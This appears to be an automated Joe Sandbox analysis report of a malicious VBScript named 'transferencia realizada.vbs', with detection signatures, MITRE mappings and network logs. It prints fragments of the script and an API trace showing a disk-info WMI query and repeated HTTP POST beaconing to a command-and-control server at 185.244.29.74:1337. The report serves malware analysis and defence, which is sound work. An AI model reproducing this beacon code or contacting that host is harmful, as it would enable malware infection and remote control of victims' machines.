Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
transferencia realizada.vbs

Overview

General Information

Sample name:transferencia realizada.vbs
Analysis ID:1524394
MD5:fe893f789402eafdc09336f38f8de977
SHA1:2360cdc1b14776d0463835fa440ba12a7d131a2f
SHA256:ceca7c78597817148e841c0744f96167e67bb3e08244e923b44006f5768bf0fe
Tags:vbsuser-N3utralZ0ne
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 6596 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 185.244.29.74, DestinationIsIpv6: false, DestinationPort: 1337, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6596, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49700
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs", ProcessId: 6596, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.244.29.74, DestinationIsIpv6: false, DestinationPort: 1337, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6596, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49700
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs", ProcessId: 6596, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.7% probability

Networking

barindex
Source: Initial file: xx.SetRequestHeader "User-Agent", gg
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 1337
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 185.244.29.74:1337
Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownHTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:1337Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74/:
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp, transferencia realizada.vbsString found in binary or memory: http://185.244.29.74:1337/document
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/document-E
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/document-L
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/document.L
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/document2
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/documentY
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/documentZ
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/document_q
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/documentfE
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD123C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:1337/documentp
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: transferencia realizada.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal76.troj.evad.winVBS@1/0@0/1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs"
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServe

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 1337
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 1337
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZN
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting
Valid Accounts1
Windows Management Instrumentation
221
Scripting
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
Boot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
transferencia realizada.vbs0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://185.244.29.74:1337/documenttrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://185.244.29.74:1337/document-Ewscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://185.244.29.74:1337/document2wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://185.244.29.74:1337/documentpwscript.exe, 00000000.00000002.3743575887.000001BCD123C000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://185.244.29.74/:wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://185.244.29.74:1337/document.Lwscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://185.244.29.74:1337/document-Lwscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://185.244.29.74:1337/documentfEwscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://185.244.29.74:1337/documentZwscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.244.29.74:1337/document_qwscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://185.244.29.74:1337/documentYwscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        185.244.29.74
                        unknownNetherlands
                        209623DAVID_CRAIGGGtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1524394
                        Start date and time:2024-10-02 18:37:04 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 55s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:16
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:transferencia realizada.vbs
                        Detection:MAL
                        Classification:mal76.troj.evad.winVBS@1/0@0/1
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Override analysis time to 240s for JS/VBS files not yet terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: transferencia realizada.vbs
                        No simulations
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.244.29.74Passport and card.vbsGet hashmaliciousUnknownBrowse
                        • 185.244.29.74:456/document
                        boking_reserva.vbsGet hashmaliciousUnknownBrowse
                        • 185.244.29.74:456/document
                        Passport.vbsGet hashmaliciousUnknownBrowse
                        • 185.244.29.74:456/document
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        DAVID_CRAIGGGPassport and card.vbsGet hashmaliciousUnknownBrowse
                        • 185.244.29.74
                        boking_reserva.vbsGet hashmaliciousUnknownBrowse
                        • 185.244.29.74
                        Passport.vbsGet hashmaliciousUnknownBrowse
                        • 185.244.29.74
                        ExeFile (351).exeGet hashmaliciousQuasarBrowse
                        • 91.193.75.100
                        PO-4ADB89.batGet hashmaliciousAgentTeslaBrowse
                        • 185.244.30.19
                        Ozb8aojWew.exeGet hashmaliciousGuLoaderBrowse
                        • 185.244.30.5
                        P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                        • 185.244.30.5
                        9y5FW1JvLf.exeGet hashmaliciousRemcosBrowse
                        • 185.140.53.144
                        ORDER-245140097DF.jsGet hashmaliciousAsyncRATBrowse
                        • 185.165.153.116
                        SecuriteInfo.com.Linux.Kaiji.16.13149.10467.elfGet hashmaliciousChaosBrowse
                        • 185.140.53.36
                        No context
                        No context
                        No created / dropped files found
                        File type:ASCII text, with CRLF line terminators
                        Entropy (8bit):5.186465554060679
                        TrID:
                          File name:transferencia realizada.vbs
                          File size:724 bytes
                          MD5:fe893f789402eafdc09336f38f8de977
                          SHA1:2360cdc1b14776d0463835fa440ba12a7d131a2f
                          SHA256:ceca7c78597817148e841c0744f96167e67bb3e08244e923b44006f5768bf0fe
                          SHA512:d530fad2f86cd24b2fbe074d85a7f7f3ef086b6429c2b32d2940d993d4bd6118adb4039f3f0aec7f15c3e971a04a4d5a6d1731a9abf7ddcd3f42071cf8b809a7
                          SSDEEP:12:e4j8lqvAHhYHzpUTYN0+rm2NfWdT4LcwijOhW/bfWdMzI7fWdVrnTGsFhk2J:8leAHhM++C2WT36W/0M0UJTGsFhXJ
                          TLSH:05019E1FE807C96A10765C5AADF1B46DD9524293B6189D06784CCCD62F72F441FC4196
                          File Content Preview:Set xx = CreateObject("MsXML2.XMLHttp").. Set objWMI = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2").. Set queryResult = objWMI.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='" & WScript.CreateObject("WScript.Shel
                          Icon Hash:68d69b8f86ab9a86
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 2, 2024 18:38:00.145663023 CEST497001337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:00.150974989 CEST133749700185.244.29.74192.168.2.7
                          Oct 2, 2024 18:38:00.151058912 CEST497001337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:00.151276112 CEST497001337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:00.156322956 CEST133749700185.244.29.74192.168.2.7
                          Oct 2, 2024 18:38:02.067270994 CEST133749700185.244.29.74192.168.2.7
                          Oct 2, 2024 18:38:02.067332029 CEST497001337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:02.067517996 CEST497001337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:02.072501898 CEST133749700185.244.29.74192.168.2.7
                          Oct 2, 2024 18:38:33.182178974 CEST497061337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:33.187058926 CEST133749706185.244.29.74192.168.2.7
                          Oct 2, 2024 18:38:33.187154055 CEST497061337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:33.187330008 CEST497061337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:33.192820072 CEST133749706185.244.29.74192.168.2.7
                          Oct 2, 2024 18:38:35.118149996 CEST133749706185.244.29.74192.168.2.7
                          Oct 2, 2024 18:38:35.118284941 CEST497061337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:35.118390083 CEST497061337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:38:35.123297930 CEST133749706185.244.29.74192.168.2.7
                          Oct 2, 2024 18:39:06.241507053 CEST497101337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:06.247016907 CEST133749710185.244.29.74192.168.2.7
                          Oct 2, 2024 18:39:06.247087002 CEST497101337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:06.247293949 CEST497101337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:06.252238035 CEST133749710185.244.29.74192.168.2.7
                          Oct 2, 2024 18:39:08.179620981 CEST133749710185.244.29.74192.168.2.7
                          Oct 2, 2024 18:39:08.179694891 CEST497101337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:08.179764986 CEST497101337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:08.184664965 CEST133749710185.244.29.74192.168.2.7
                          Oct 2, 2024 18:39:39.310378075 CEST497111337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:39.316371918 CEST133749711185.244.29.74192.168.2.7
                          Oct 2, 2024 18:39:39.316471100 CEST497111337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:39.316751003 CEST497111337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:39.321934938 CEST133749711185.244.29.74192.168.2.7
                          Oct 2, 2024 18:39:41.254582882 CEST133749711185.244.29.74192.168.2.7
                          Oct 2, 2024 18:39:41.255234957 CEST497111337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:41.255234957 CEST497111337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:39:41.261535883 CEST133749711185.244.29.74192.168.2.7
                          Oct 2, 2024 18:40:12.378165960 CEST497121337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:12.383378029 CEST133749712185.244.29.74192.168.2.7
                          Oct 2, 2024 18:40:12.383539915 CEST497121337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:12.383682966 CEST497121337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:12.388701916 CEST133749712185.244.29.74192.168.2.7
                          Oct 2, 2024 18:40:14.308636904 CEST133749712185.244.29.74192.168.2.7
                          Oct 2, 2024 18:40:14.308785915 CEST497121337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:14.308959961 CEST497121337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:14.313817978 CEST133749712185.244.29.74192.168.2.7
                          Oct 2, 2024 18:40:45.433135986 CEST497131337192.168.2.7185.244.29.74
                          Oct 2, 2024 18:40:45.438074112 CEST133749713185.244.29.74192.168.2.7
                          Oct 2, 2024 18:40:45.438179970 CEST497131337192.168.2.7185.244.29.74
